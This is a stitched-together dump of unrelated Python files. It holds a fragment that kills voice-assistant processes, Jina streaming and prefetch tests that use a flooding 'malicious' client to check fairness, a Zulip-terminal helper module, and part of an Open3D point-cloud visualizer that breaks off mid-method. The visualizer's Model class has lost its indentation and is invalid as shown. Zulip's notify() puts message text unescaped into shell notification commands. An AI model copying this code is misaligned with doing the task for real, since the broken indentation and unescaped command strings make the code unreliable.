        os.kill(int(jpid), signal.SIGHUP)
        jupid = process_exists('julius/connect.py')
        logger.info('Terminate julius connector process %s ', jupid)
        os.kill(int(jupid), signal.SIGHUP)
        ipid = process_exists('init.py')
        logger.info('Terminate main %s ', ipid)
        os.kill(int(ipid), signal.SIGHUP)
        bpid = process_exists('brain/listener.py')
        logger.info('Terminate brain listener process %s ', bpid)
        os.kill(int(bpid), signal.SIGHUP)
        opid = process_exists('core/output.py')
        logger.info('Terminate output process %s ', opid)
        os.kill(int(opid), signal.SIGHUP)
        apid = process_exists('brain/ask.py')
        logger.info('Terminate ask process %s ', apid)
        os.kill(int(apid), signal.SIGHUP)
|
test_clients_streaming.py | import os
import time, asyncio
from typing import List
from datetime import datetime
from functools import partial
from multiprocessing import Process, current_process
import pytest
from jina import Flow, Document, DocumentArray, Executor, requests, Client
INPUT_LEN = 4
INPUT_GEN_SLEEP_TIME = 1
SLOW_EXECUTOR_SLEEP_TIME = 5
def readable_time_from(t):
    """Render an epoch timestamp as a 'MM:SS:microseconds' string (UTC)."""
    as_utc = datetime.utcfromtimestamp(t)
    return as_utc.strftime('%M:%S:%f')
def get_document(i, name):
    """Build Document number *i*, tagged (and logged) with its creation time."""
    created_at = time.time()
    print(f'in {name} {i}, time: {readable_time_from(created_at)}, {created_at}', flush=True)
    return Document(id=f'id-{i}', tags={'input_gen': created_at})
def blocking_gen():
    """Synchronous generator that yields INPUT_LEN docs, pausing 0.1s after each."""
    for doc_idx in range(INPUT_LEN):
        yield get_document(doc_idx, name='blocking_gen')
        time.sleep(0.1)
async def async_gen():
    """Async generator that yields INPUT_LEN docs, awaiting 0.1s after each."""
    for doc_idx in range(INPUT_LEN):
        yield get_document(doc_idx, name='async_gen')
        await asyncio.sleep(0.1)
def slow_blocking_gen():
    """Synchronous generator that sleeps INPUT_GEN_SLEEP_TIME secs between docs."""
    for doc_idx in range(INPUT_LEN):
        yield get_document(doc_idx, name='slow_blocking_gen')
        time.sleep(INPUT_GEN_SLEEP_TIME)
async def slow_async_gen():
    """Async generator that awaits INPUT_GEN_SLEEP_TIME secs between docs."""
    for doc_idx in range(INPUT_LEN):
        yield get_document(doc_idx, name='slow_async_gen')
        await asyncio.sleep(INPUT_GEN_SLEEP_TIME)
class FastExecutor(Executor):
    """Executor that responds immediately, stamping each doc with handling time."""

    @requests
    def foo(self, docs: DocumentArray, **kwargs):
        for doc in docs:
            handled_at = time.time()
            doc.tags['executor'] = handled_at
            print(
                f'in FastExecutor: {doc.id}, time: {readable_time_from(handled_at)}, {handled_at}',
                flush=True,
            )
class SlowExecutor(Executor):
    """Slow Executor (sleeps SLOW_EXECUTOR_SLEEP_TIME secs b/w each req)"""
    @requests
    def foo(self, docs: DocumentArray, **kwargs):
        # Simulate a slow handler before timestamping the batch.
        time.sleep(SLOW_EXECUTOR_SLEEP_TIME)
        for doc in docs:
            doc.tags['executor'] = time.time()
            print(
                f'in SlowExecutor: {doc.id}, time: {readable_time_from(doc.tags["executor"])}, {doc.tags["executor"]}',
                flush=True,
            )
def on_done(response, final_da: DocumentArray):
    """Client callback: stamp each returned doc with its arrival time and collect it."""
    print(f' receiving response {response._pb_body.request_id}')
    for doc in response.docs:
        arrived_at = time.time()
        doc.tags['on_done'] = arrived_at
        print(
            f'in on_done {doc.id}, time: {readable_time_from(arrived_at)}, {arrived_at}',
            flush=True,
        )
    final_da.extend(response.docs)
@pytest.mark.parametrize('grpc_data_requests', [False, True])
@pytest.mark.parametrize(
    'protocol, inputs',
    [
        ('grpc', slow_async_gen),
        pytest.param(
            'grpc',
            slow_blocking_gen,
            marks=pytest.mark.skip(
                reason='grpc client + sync generator with time.sleep is expected to fail'
            ),
        ),
        ('websocket', slow_async_gen),
        ('websocket', slow_blocking_gen),
        ('http', slow_async_gen),
        ('http', slow_blocking_gen),
    ],
)
def test_disable_prefetch_slow_client_fast_executor(
    grpc_data_requests, protocol, inputs
):
    """Slow client + fast Executor: every request must complete its full
    gen -> executor -> on_done cycle before the next doc is generated."""
    print(
        f'\n\nRunning disable prefetch, slow client, fast Executor test for \n'
        f'protocol: {protocol}, input: {inputs.__name__}, grpc_data_req: {grpc_data_requests}'
    )
    final_da = DocumentArray()
    with Flow(protocol=protocol, grpc_data_requests=grpc_data_requests).add(
        uses=FastExecutor
    ) as f:
        f.post(
            on='/',
            inputs=inputs,
            request_size=1,
            on_done=lambda response: on_done(response, final_da),
        )
    assert len(final_da) == INPUT_LEN
    # Since the input_gen is slow, order will always be gen -> exec -> on_done
    # for every request. Loop replaces the previous copy-pasted id-0..id-3
    # assertions so the check follows INPUT_LEN automatically.
    for i in range(INPUT_LEN):
        tags = final_da[f'id-{i}'].tags
        assert tags['input_gen'] < tags['executor']
        assert tags['executor'] < tags['on_done']
        if i + 1 < INPUT_LEN:
            assert tags['on_done'] < final_da[f'id-{i + 1}'].tags['input_gen']
@pytest.mark.parametrize('grpc_data_requests', [True, False])
@pytest.mark.parametrize(
    'protocol, inputs',
    [
        ('grpc', async_gen),
        ('grpc', blocking_gen),
        ('websocket', async_gen),
        ('websocket', blocking_gen),
        ('http', async_gen),
        ('http', blocking_gen),
    ],
)
def test_disable_prefetch_fast_client_slow_executor(
    grpc_data_requests, protocol, inputs
):
    """Fast client + slow Executor: all inputs should be generated before the
    first request leaves the Executor, and responses must not queue up."""
    print(
        f'\n\nRunning disable prefetch, fast client, slow Executor test for \n'
        f'protocol: {protocol}, input: {inputs.__name__}, grpc_data_req: {grpc_data_requests}'
    )
    final_da = DocumentArray()
    with Flow(protocol=protocol, grpc_data_requests=grpc_data_requests).add(
        uses=SlowExecutor
    ) as f:
        f.post(
            on='/',
            inputs=inputs,
            request_size=1,
            on_done=lambda response: on_done(response, final_da),
        )
    assert len(final_da) == INPUT_LEN
    # since Executor is slow, all client inputs should be read before 1st
    # request exits from Executor. Loop replaces the previous copy-pasted
    # per-id assertions so the check follows INPUT_LEN automatically.
    for i in range(INPUT_LEN - 1):
        this_doc = final_da[f'id-{i}']
        next_doc = final_da[f'id-{i + 1}']
        assert this_doc.id < next_doc.id, (
            f'ids are not ordered with times {this_doc.tags["input_gen"]}'
            f' and {next_doc.tags["input_gen"]}'
        )
        assert this_doc.tags['input_gen'] < next_doc.tags['input_gen']
    assert (
        final_da[f'id-{INPUT_LEN - 1}'].tags['input_gen']
        < final_da['id-0'].tags['executor']
    )
    # At least 1 request should reach `on_done` before all requests are
    # processed in the Executor.
    # Validates that the requests are not pending at the Executor
    first_on_done_time = min(i.tags['on_done'] for i in final_da)
    last_executor_time = max(i.tags['executor'] for i in final_da)
    assert first_on_done_time < last_executor_time
class Indexer(Executor):
    """Toy indexer that accumulates every indexed doc in a class-level DocumentArray."""

    docs = DocumentArray()

    @requests(on='/index')
    def index(self, docs: DocumentArray, **kwargs):
        # Simulate a bit of work before storing the batch.
        time.sleep(0.1)
        self.docs.extend(docs)

    @requests(on='/status')
    def status(self, **kwargs):
        # returns ids of all docs in tags
        indexed_ids = self.docs.get_attributes('id')
        return DocumentArray(Document(tags={'ids': indexed_ids}))
@pytest.mark.parametrize('prefetch', [0, 5])
@pytest.mark.parametrize('protocol', ['websocket', 'http', 'grpc'])
@pytest.mark.parametrize('grpc_data_requests', [False, True])
def test_multiple_clients(prefetch, protocol, grpc_data_requests):
    """Run 5 well-behaved clients and 1 flooding client against one gateway
    and check whose requests finish last under each prefetch setting."""
    os.environ['JINA_LOG_LEVEL'] = 'INFO'
    GOOD_CLIENTS = 5
    GOOD_CLIENT_NUM_DOCS = 20
    MALICIOUS_CLIENT_NUM_DOCS = 50

    def get_document(i):
        # Doc id encodes the sending process name so we can attribute it later.
        return Document(
            id=f'{current_process().name}_{i}',
            buffer=bytes(bytearray(os.urandom(512 * 4))),
        )

    async def good_client_gen():
        # Controlled client: pauses between requests.
        for i in range(GOOD_CLIENT_NUM_DOCS):
            yield get_document(i)
            await asyncio.sleep(0.1)

    async def malicious_client_gen():
        # Flooding client: no pause between requests.
        for i in range(1000, 1000 + MALICIOUS_CLIENT_NUM_DOCS):
            yield get_document(i)

    def client(gen, port, protocol):
        Client(protocol=protocol, port=port).post(
            on='/index', inputs=gen, request_size=1
        )

    pool: List[Process] = []
    f = Flow(
        protocol=protocol, prefetch=prefetch, grpc_data_requests=grpc_data_requests
    ).add(uses=Indexer)
    with f:
        # We have 5 good clients connecting to the same gateway. They have controlled requests.
        # Each client sends `GOOD_CLIENT_NUM_DOCS` (20) requests and sleeps after each request.
        for i in range(GOOD_CLIENTS):
            p = Process(
                target=partial(client, good_client_gen, f.port_expose, protocol),
                name=f'goodguy_{i}',
            )
            p.start()
            pool.append(p)
        # and 1 malicious client, sending lot of requests (trying to block others)
        p = Process(
            target=partial(client, malicious_client_gen, f.port_expose, protocol),
            name='badguy',
        )
        p.start()
        pool.append(p)
        for p in pool:
            p.join()
        # Ask the Indexer for the order in which docs were indexed.
        order_of_ids = list(
            Client(protocol=protocol, port=f.port_expose)
            .post(on='/status', inputs=[Document()], return_results=True)[0]
            .docs[0]
            .tags['ids']
        )
        # There must be total 150 docs indexed.
        assert (
            len(order_of_ids)
            == GOOD_CLIENTS * GOOD_CLIENT_NUM_DOCS + MALICIOUS_CLIENT_NUM_DOCS
        )
        """
        If prefetch is set, each Client is allowed (max) 5 requests at a time.
        Since requests are controlled, `badguy` has to do the last 20 requests.

        If prefetch is disabled, clients can freeflow requests. No client is blocked.
        Hence last 20 requests go from `goodguy`.
        (Ideally last 30 requests should be validated, to avoid flaky CI, we test last 20)

        When there are no rules, badguy wins! With rule, you find balance in the world.
        """
        if protocol == 'http':
            # There's no prefetch for http.
            assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {
                'goodguy'
            }
        elif prefetch == 5:
            assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'badguy'}
        elif prefetch == 0:
            assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {
                'goodguy'
            }
|
helper.py | import os
import platform
import shlex
import subprocess
import time
from collections import defaultdict
from functools import wraps
from itertools import chain, combinations
from re import ASCII, match
from threading import Thread
from typing import (
Any, Callable, DefaultDict, Dict, FrozenSet, Iterable, List, Optional, Set,
Tuple, Union,
)
import lxml.html
from mypy_extensions import TypedDict
MACOS = platform.system() == "Darwin"  # True when running on macOS
LINUX = platform.system() == "Linux"  # True when running on Linux
WSL = 'Microsoft' in platform.release()  # True under Windows Subsystem for Linux
# A raw Zulip message payload, keyed by field name.
Message = Dict[str, Any]
# Central cache of downloaded messages, bucketed per narrow category.
Index = TypedDict('Index', {
    'pointer': Dict[str, Union[int, Set[None]]],  # narrow_str, message_id
    # Various sets of downloaded message ids (all, starred, ...)
    'all_msg_ids': Set[int],
    'starred_msg_ids': Set[int],
    'private_msg_ids': Set[int],
    'private_msg_ids_by_user_ids': Dict[FrozenSet[int], Set[int]],
    'stream_msg_ids_by_stream_id': Dict[int, Set[int]],
    'topic_msg_ids': Dict[int, Dict[str, Set[int]]],
    # Extra cached information
    'edited_messages': Set[int],  # {message_ids, ...}
    'topics': Dict[int, List[str]],  # {topic names, ...}
    'search': Set[int],  # {message_id, ...}
    # Downloaded message data
    'messages': Dict[int, Message],  # message_id: Message
    # unread message data; additional data in model.initial_data['unread_msgs']
    'unread_msg_ids': Set[int]  # {message_ids, ...}
})
# Empty starting index with the right container type for every key.
initial_index = Index(
    pointer=defaultdict(set),
    all_msg_ids=set(),
    starred_msg_ids=set(),
    private_msg_ids=set(),
    private_msg_ids_by_user_ids=defaultdict(set),
    stream_msg_ids_by_stream_id=defaultdict(set),
    topic_msg_ids=defaultdict(dict),
    edited_messages=set(),
    topics=defaultdict(list),
    search=set(),
    messages=defaultdict(dict),
    unread_msg_ids=set(),
)
# Unread-count totals shown in the UI, bucketed per category.
UnreadCounts = TypedDict('UnreadCounts', {
    'all_msg': int,
    'all_pms': int,
    'unread_topics': Dict[Tuple[int, str], int],  # stream_id, topic
    'unread_pms': Dict[int, int],  # sender_id
    'unread_huddles': Dict[FrozenSet[int], int],  # Group pms
    'streams': Dict[int, int],  # stream_id
})
def asynch(func: Any) -> Any:
    """
    Decorator for executing a function in a separate :class:`threading.Thread`.
    """
    @wraps(func)
    def launch_in_thread(*args: Any, **kwargs: Any) -> Any:
        # Under pytest, run synchronously instead of spawning a thread so
        # tests observe the return value directly.
        if os.environ.get("PYTEST_CURRENT_TEST"):
            return func(*args, **kwargs)
        worker = Thread(target=func, args=args, kwargs=kwargs)
        worker.daemon = True
        return worker.start()
    return launch_in_thread
def set_count(id_list: List[int], controller: Any, new_count: int) -> None:
    """Apply an unread-count delta for the given message ids and refresh the UI.

    First pass updates the per-key count dicts (topic / 1:1 pm / huddle);
    second pass updates the sidebar button widgets and the aggregate
    all_msg/all_pms totals, then redraws the screen.
    """
    # This method applies new_count for 'new message' (1) or 'read' (-1)
    # (we could ensure this in a different way by a different type)
    assert new_count == 1 or new_count == -1
    messages = controller.model.index['messages']
    unread_counts = controller.model.unread_counts  # type: UnreadCounts
    for id in id_list:
        msg = messages[id]
        if msg['type'] == 'stream':
            key = (messages[id]['stream_id'], msg['subject'])
            unreads = unread_counts['unread_topics']
        # self-pm has only one display_recipient
        # 1-1 pms have 2 display_recipient
        elif len(msg['display_recipient']) <= 2:
            key = messages[id]['sender_id']
            unreads = unread_counts['unread_pms']  # type: ignore
        else:  # If it's a group pm
            key = frozenset(  # type: ignore
                recipient['id'] for recipient in msg['display_recipient']
            )
            unreads = unread_counts['unread_huddles']  # type: ignore
        # broader unread counts (for all_* and streams) are updated
        # later conditionally.
        if key in unreads:
            unreads[key] += new_count
            # Drop keys that reach zero so empty entries don't linger.
            if unreads[key] == 0:
                unreads.pop(key)
        elif new_count == 1:
            unreads[key] = new_count
    # if view is not yet loaded. Usually the case when first message is read.
    while not hasattr(controller, 'view'):
        time.sleep(0.1)
    stream_buttons_log = controller.view.stream_w.log
    is_open_topic_view = controller.view.left_panel.is_in_topic_view
    if is_open_topic_view:
        topic_buttons_log = controller.view.topic_w.log
        toggled_stream_id = controller.view.topic_w.stream_button.stream_id
    user_buttons_log = controller.view.user_w.log
    all_msg = controller.view.home_button
    all_pm = controller.view.pm_button
    for id in id_list:
        user_id = messages[id]['sender_id']
        # If we sent this message, don't increase the count
        if user_id == controller.model.user_id:
            continue
        msg_type = messages[id]['type']
        add_to_counts = True
        if msg_type == 'stream':
            stream_id = messages[id]['stream_id']
            msg_topic = messages[id]['subject']
            if controller.model.is_muted_stream(stream_id):
                add_to_counts = False  # if muted, don't add to eg. all_msg
            else:
                for stream_button in stream_buttons_log:
                    if stream_button.stream_id == stream_id:
                        # FIXME: Update unread_count[streams]?
                        stream_button.update_count(stream_button.count +
                                                   new_count)
                        break
            # FIXME: Update unread_counts['unread_topics']?
            if ([messages[id]['display_recipient'], msg_topic] in
                    controller.model.muted_topics):
                add_to_counts = False
            if is_open_topic_view and stream_id == toggled_stream_id:
                # If topic_view is open for incoming messages's stream,
                # We update the respective TopicButton count accordingly.
                for topic_button in topic_buttons_log:
                    if topic_button.topic_name == msg_topic:
                        topic_button.update_count(topic_button.count +
                                                  new_count)
        else:
            # Private message: bump the sender's user button and pm totals.
            for user_button in user_buttons_log:
                if user_button.user_id == user_id:
                    user_button.update_count(user_button.count + new_count)
                    break
            unread_counts['all_pms'] += new_count
            all_pm.update_count(unread_counts['all_pms'])
        if add_to_counts:
            unread_counts['all_msg'] += new_count
            all_msg.update_count(unread_counts['all_msg'])
    # Wait for the urwid main loop before forcing a redraw.
    while not hasattr(controller, 'loop'):
        time.sleep(0.1)
    controller.update_screen()
def index_messages(messages: List[Message],
                   model: Any,
                   index: Index) -> Index:
    """
    Merge *messages* into *index*, filing each message id into the id-sets
    that match the model's current narrow.

    The index stores every message dict under 'messages' (keyed by id) and
    maintains per-category id-sets: 'all_msg_ids' (no narrow), 'search'
    (search narrows), 'starred_msg_ids', 'private_msg_ids',
    'private_msg_ids_by_user_ids' (keyed by recipient user-id frozenset),
    'stream_msg_ids_by_stream_id', 'topic_msg_ids'
    (stream id -> topic name -> ids) and 'edited_messages'.
    """
    narrow = model.narrow
    for msg in messages:
        msg_id = msg['id']
        if 'edit_history' in msg.keys():
            index['edited_messages'].add(msg_id)
        index['messages'][msg_id] = msg
        if not narrow:
            index['all_msg_ids'].add(msg_id)
        elif model.is_search_narrow():
            # Search results are filed only under 'search'.
            index['search'].add(msg_id)
            continue
        if len(narrow) == 1:
            if narrow[0][1] == 'starred' and 'starred' in msg['flags']:
                index['starred_msg_ids'].add(msg_id)
            if msg['type'] == 'private':
                index['private_msg_ids'].add(msg_id)
                recipients = frozenset(
                    recipient['id'] for recipient in msg['display_recipient']
                )
                if narrow[0][0] == 'pm_with':
                    # The narrow names recipients by email; compare as a
                    # user-id frozenset including ourselves.
                    narrow_user_ids = frozenset(
                        [model.user_dict[email]['user_id']
                         for email in narrow[0][1].split(', ')]
                        + [model.user_id]
                    )
                    if recipients == narrow_user_ids:
                        (index['private_msg_ids_by_user_ids'][recipients]
                         .add(msg_id))
            if msg['type'] == 'stream' and msg['stream_id'] == model.stream_id:
                (index['stream_msg_ids_by_stream_id'][msg['stream_id']]
                 .add(msg_id))
        if (msg['type'] == 'stream' and len(narrow) == 2
                and narrow[1][1] == msg['subject']):
            topics_in_stream = index['topic_msg_ids'][msg['stream_id']]
            if not topics_in_stream.get(msg['subject']):
                topics_in_stream[msg['subject']] = set()
            topics_in_stream[msg['subject']].add(msg_id)
    return index
def classify_unread_counts(model: Any) -> Tuple[UnreadCounts, Set[int]]:
    """Split the server's initial unread data into per-category counts.

    Returns the populated UnreadCounts structure together with the flat set
    of all unread message ids.
    """
    # TODO: support group pms
    initial_unreads = model.initial_data['unread_msgs']
    unread_msg_ids = set()  # type: Set[int]
    unread_counts = UnreadCounts(
        all_msg=0,
        all_pms=0,
        unread_topics=dict(),
        unread_pms=dict(),
        unread_huddles=dict(),
        streams=dict(),
    )
    for pm in initial_unreads['pms']:
        pm_ids = pm['unread_message_ids']
        unread_msg_ids.update(pm_ids)
        num_unread = len(pm_ids)
        unread_counts['unread_pms'][pm['sender_id']] = num_unread
        unread_counts['all_msg'] += num_unread
        unread_counts['all_pms'] += num_unread
    for stream in initial_unreads['streams']:
        stream_ids = stream['unread_message_ids']
        unread_msg_ids.update(stream_ids)
        num_unread = len(stream_ids)
        stream_id = stream['stream_id']
        # Muted topics contribute to the id set but not to visible counts.
        if [model.stream_dict[stream_id]['name'],
                stream['topic']] in model.muted_topics:
            continue
        stream_topic = (stream_id, stream['topic'])
        unread_counts['unread_topics'][stream_topic] = num_unread
        if not unread_counts['streams'].get(stream_id):
            unread_counts['streams'][stream_id] = num_unread
        else:
            unread_counts['streams'][stream_id] += num_unread
        unread_counts['all_msg'] += num_unread
    # store unread count of group pms in `unread_huddles`
    for group_pm in initial_unreads['huddles']:
        huddle_ids = group_pm['unread_message_ids']
        unread_msg_ids.update(huddle_ids)
        num_unread = len(huddle_ids)
        user_ids = frozenset(map(int, group_pm['user_ids_string'].split(',')))
        unread_counts['unread_huddles'][user_ids] = num_unread
        unread_counts['all_msg'] += num_unread
        unread_counts['all_pms'] += num_unread
    return unread_counts, unread_msg_ids
def match_user(user: Any, text: str) -> bool:
    """
    Matches if the user full name, last name or email matches
    with `text` or not.
    """
    prefix = text.lower()
    full_name = user['full_name'].lower()
    candidates = full_name.split()
    # adding full_name helps in further narrowing down the right user.
    candidates.append(full_name)
    candidates.append(user['email'].lower())
    return any(candidate.startswith(prefix) for candidate in candidates)
def match_stream(stream: Any, text: str) -> bool:
    """
    True if the stream matches with `text` (case insensitive),
    False otherwise.
    """
    # First element of the stream tuple is its display name.
    return stream[0].lower().startswith(text.lower())
def match_groups(group_name: str, text: str) -> bool:
    """
    True if any group name matches with `text` (case insensitive),
    False otherwise.
    """
    prefix = text.lower()
    return group_name.lower().startswith(prefix)
def powerset(iterable: Iterable[Any],
             map_func: Callable[[Any], Any]=set) -> List[Any]:
    """
    Return every subset of *iterable*, each converted via *map_func*.

    >> powerset([1,2,3])
    returns: [set(), {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}]
    """
    s = list(iterable)
    # Renamed from `powerset` — the old local shadowed the function itself.
    # (The redundant inner list() around the iterator is also dropped.)
    subsets = chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))
    return list(map(map_func, subsets))
def canonicalize_color(color: str) -> str:
    """
    Given a color of the format '#xxxxxx' or '#xxx', produces one of the
    format '#xxx'. Always produces lowercase hex digits.
    """
    if match('^#[0-9A-Fa-f]{6}$', color, ASCII) is not None:
        # Six-digit form (current zulip server): keep the leading digit of
        # each R/G/B pair.
        shortened = color[0] + color[1] + color[3] + color[5]
        return shortened.lower()
    if match('^#[0-9A-Fa-f]{3}$', color, ASCII) is not None:
        # Already short form; may be stored by zulip server <= 2.0.0
        # (potentially later versions too).
        return color.lower()
    raise ValueError('Unknown format for color "{}"'.format(color))
@asynch
def notify(title: str, html_text: str) -> None:
    """Fire a desktop notification (WSL / macOS / Linux) for the given message."""
    dom = lxml.html.document_fromstring(html_text)
    plain_text = dom.text_content()
    command = ""
    if WSL:
        command = ('powershell.exe "New-BurntToastNotification'
                   ' -Text \'{}\', \'{}\'"'.format(title, plain_text))
    elif MACOS:
        command = ("osascript -e 'display notification \"{}\" with title"
                   " \"{}\"'".format(plain_text, title))
    elif LINUX:
        command = 'notify-send "{}" "{}"'.format(title, plain_text)
    if command:
        # Fire-and-forget: the notifier's output is irrelevant, discard it.
        subprocess.run(shlex.split(command), stdout=subprocess.DEVNULL,
                       stderr=subprocess.STDOUT)
|
visualizer.py | import math
import numpy as np
import threading
import open3d as o3d
from open3d.visualization import gui
from open3d.visualization import rendering
from collections import deque
from .boundingbox import *
from .colormap import *
from .labellut import *
import time
class Model:
"""The class that helps build visualization models based on attributes, data, and methods."""
bounding_box_prefix = "Bounding Boxes/"
class BoundingBoxData:
"""The class to define a bounding box that is used to describe the target location.
Args:
name: The name of the pointcloud array.
boxes: The array of pointcloud that define the bounding box.
"""
def __init__(self, name, boxes):
self.name = name
self.boxes = boxes
def __init__(self):
# Note: the tpointcloud cannot store the actual data arrays, because
# the tpointcloud requires specific names for some arrays (e.g. "points",
# "colors"). So the tpointcloud exists for rendering and initially only
# contains the "points" array.
self.tclouds = {} # name -> tpointcloud
self.data_names = [] # the order data will be displayed / animated
self.bounding_box_data = [] # [BoundingBoxData]
self._data = {} # name -> {attr_name -> numpyarray}
self._known_attrs = {} # name -> set(attrs)
self._attr2minmax = {} # only access in _get_attr_minmax()
self._attr_rename = {"label": "labels", "feat": "feature"}
def _init_data(self, name):
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
self.data_names.append(name)
def is_loaded(self, name):
"""Check if the data is loaded."""
if name in self._data:
return len(self._data[name]) > 0
else:
# if the name isn't in the data, presumably it is loaded
# (for instance, if this is a bounding box).
return True
def load(self, name, fail_if_no_space=False):
"""If data is not loaded, then load the data."""
assert (False) # pure virtual
def unload(self, name):
assert (False) # pure virtual
def create_point_cloud(self, data):
"""Create a point cloud based on the data provided. The data should include name and points."""
assert ("name" in data) # name is a required field
assert ("points" in data) # 'points' is a required field
name = data["name"]
pts = self._convert_to_numpy(data["points"])
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
known_attrs = set()
if pts.shape[1] >= 4:
# We can't use inplace Tensor creation (e.g. from_numpy())
# because the resulting arrays won't be contiguous. However,
# TensorList can be inplace.
xyz = pts[:, [0, 1, 2]]
tcloud.point["points"] = Visualizer._make_tcloud_array(xyz,
copy=True)
else:
tcloud.point["points"] = Visualizer._make_tcloud_array(pts)
self.tclouds[name] = tcloud
# Add scalar attributes and vector3 attributes
attrs = {}
for k, v in data.items():
attr = self._convert_to_numpy(v)
if attr is None:
continue
attr_name = k
if attr_name == "point":
continue
new_name = self._attr_rename.get(attr_name)
if new_name is not None:
attr_name = new_name
if len(attr.shape) == 1 or len(attr.shape) == 2:
attrs[attr_name] = attr
known_attrs.add(attr_name)
self._data[name] = attrs
self._known_attrs[name] = known_attrs
def _convert_to_numpy(self, ary):
if isinstance(ary, list):
try:
return np.array(ary, dtype='float32')
except TypeError:
return None
elif isinstance(ary, np.ndarray):
if len(ary.shape) == 2 and ary.shape[0] == 1:
ary = ary[0] # "1D" array as 2D: [[1, 2, 3,...]]
if ary.dtype.name.startswith('int'):
return np.array(ary, dtype='float32')
else:
return ary
try:
import tensorflow as tf
if isinstance(ary, tf.Tensor):
return self._convert_to_numpy(ary.numpy())
except:
pass
try:
import torch
if isinstance(ary, torch.Tensor):
return self._convert_to_numpy(ary.detach().cpu().numpy())
except:
pass
return None
def get_attr(self, name, attr_name):
"""Get an attribute from data based on the name passed."""
if name in self._data:
attrs = self._data[name]
if attr_name in attrs:
return attrs[attr_name]
return None
def get_attr_shape(self, name, attr_name):
"""Get a shape from data based on the name passed."""
attr = self.get_attr(name, attr_name)
if attr is not None:
return attr.shape
return []
def get_attr_minmax(self, attr_name, channel):
"""Get the minimum and maximum for an attribute."""
attr_key_base = attr_name + ":" + str(channel)
attr_min = 1e30
attr_max = -1e30
for name in self._data.keys():
key = name + ":" + attr_key_base
if key not in self._attr2minmax:
attr = self.get_attr(name, attr_name)
if attr is None: # clouds may not have all the same attributes
continue
if len(attr.shape) > 1:
attr = attr[:, channel]
self._attr2minmax[key] = (attr.min(), attr.max())
amin, amax = self._attr2minmax[key]
attr_min = min(attr_min, amin)
attr_max = max(attr_max, amax)
if attr_min > attr_max:
return (0.0, 0.0)
return (attr_min, attr_max)
def get_available_attrs(self, names):
"""Get a list of attributes based on the name."""
attr_names = None
for n in names:
known = self._known_attrs.get(n)
if known is not None:
if attr_names is None:
attr_names = known
else:
attr_names = attr_names.intersection(known)
if attr_names is None:
return []
return sorted(attr_names)
def calc_bounds_for(self, name):
"""Calculate the bounds for a pointcloud."""
if name in self.tclouds and not self.tclouds[name].is_empty():
tcloud = self.tclouds[name]
# Ideally would simply return tcloud.compute_aabb() here, but it can
# be very slow on macOS with clang 11.0
pts = tcloud.point["points"].numpy()
min_val = (pts[:, 0].min(), pts[:, 1].min(), pts[:, 2].min())
max_val = (pts[:, 0].max(), pts[:, 1].max(), pts[:, 2].max())
return [min_val, max_val]
else:
return [(0.0, 0.0, 0.0), (0.0, 0.0, 0.0)]
class DataModel(Model):
    """The class for data i/o and storage of visualization.

    Args:
        userdata: The dataset to be used in the visualization.
    """

    def __init__(self, userdata):
        super().__init__()
        # We could just create the TPointCloud here, but that would cause the
        # UI to block. Deferring it to load() lets the loading dialog display.
        self._name2srcdata = {}
        for entry in userdata:
            unique_name = entry["name"]
            while unique_name in self._data:  # ensure each name is unique
                unique_name += "_"
            self._init_data(unique_name)
            self._name2srcdata[unique_name] = entry

    def load(self, name, fail_if_no_space=False):
        """Load a pointcloud based on the name provided."""
        if not self.is_loaded(name):
            self.create_point_cloud(self._name2srcdata[name])

    def unload(self, name):
        """Unload a pointcloud (no-op: user data stays in memory)."""
        pass
class DatasetModel(Model):
    """The class used to manage a dataset model.

    Keeps an LRU cache (`_cached_data`) of loaded point clouds and evicts the
    oldest entries when the estimated memory use exceeds `_memory_limit`.

    Args:
        dataset: The 3D ML dataset to use. You can use the base dataset, sample datasets , or a custom dataset.
        split: A string identifying the dataset split that is usually one of 'training', 'test', 'validation', or 'all'.
        indices: The indices to be used for the datamodel. This may vary based on the split used.
    """

    def __init__(self, dataset, split, indices):
        super().__init__()
        self._dataset = None
        self._name2datasetidx = {}
        self._memory_limit = 8192 * 1024 * 1024  # memory limit in bytes
        self._current_memory_usage = 0
        self._cached_data = deque()  # LRU order: oldest loaded name at the left

        self._dataset = dataset.get_split(split)
        if len(self._dataset) > 0:
            if indices is None:
                indices = range(0, len(self._dataset))
            # Some results from get_split() (like "training") are randomized.
            # Sort, so that the same index always returns the same piece of data.
            path2idx = {}
            for i in range(0, len(self._dataset.path_list)):
                path2idx[self._dataset.path_list[i]] = i
            real_indices = [path2idx[p] for p in sorted(path2idx.keys())]
            indices = [real_indices[idx] for idx in indices]

            # SemanticKITTI names its items <sequence#>_<timeslice#>,
            # "mm_nnnnnn". We'd like to use the hierarchical feature of the tree
            # to separate the sequences. We cannot change the name in the dataset
            # because this format is used to report algorithm results, so do it
            # here.
            underscore_to_slash = False
            if dataset.__class__.__name__ == "SemanticKITTI":
                underscore_to_slash = True

            for i in indices:
                info = self._dataset.get_attr(i)
                name = info["name"]
                if underscore_to_slash:
                    name = name.replace("_", "/")
                while name in self._data:  # ensure each name is unique
                    name = name + "_"

                self._init_data(name)
                self._name2datasetidx[name] = i

            # These datasets carry RGB data in "feat"; show it as "colors".
            if dataset.__class__.__name__ in [
                    "Toronto3D", "Semantic3D", "S3DIS"
            ]:
                self._attr_rename["feat"] = "colors"
                self._attr_rename["feature"] = "colors"
        else:
            print("[ERROR] Dataset split has no data")

    def is_loaded(self, name):
        """Check if the data is loaded; touching it refreshes its LRU slot."""
        loaded = super().is_loaded(name)
        if loaded and name in self._cached_data:
            # make this point cloud the most recently used
            self._cached_data.remove(name)
            self._cached_data.append(name)
        return loaded

    def load(self, name, fail_if_no_space=False):
        """Check if data is not loaded, and then load the data.

        Returns True on success; False only when the cloud does not fit in
        the memory budget and `fail_if_no_space` is set.
        """
        assert (name in self._name2datasetidx)

        if self.is_loaded(name):
            return True

        idx = self._name2datasetidx[name]
        data = self._dataset.get_data(idx)
        data["name"] = name
        data["points"] = data["point"]

        if 'bounding_boxes' in data:
            self.bounding_box_data.append(
                Model.BoundingBoxData(name, data['bounding_boxes']))

        self.create_point_cloud(data)
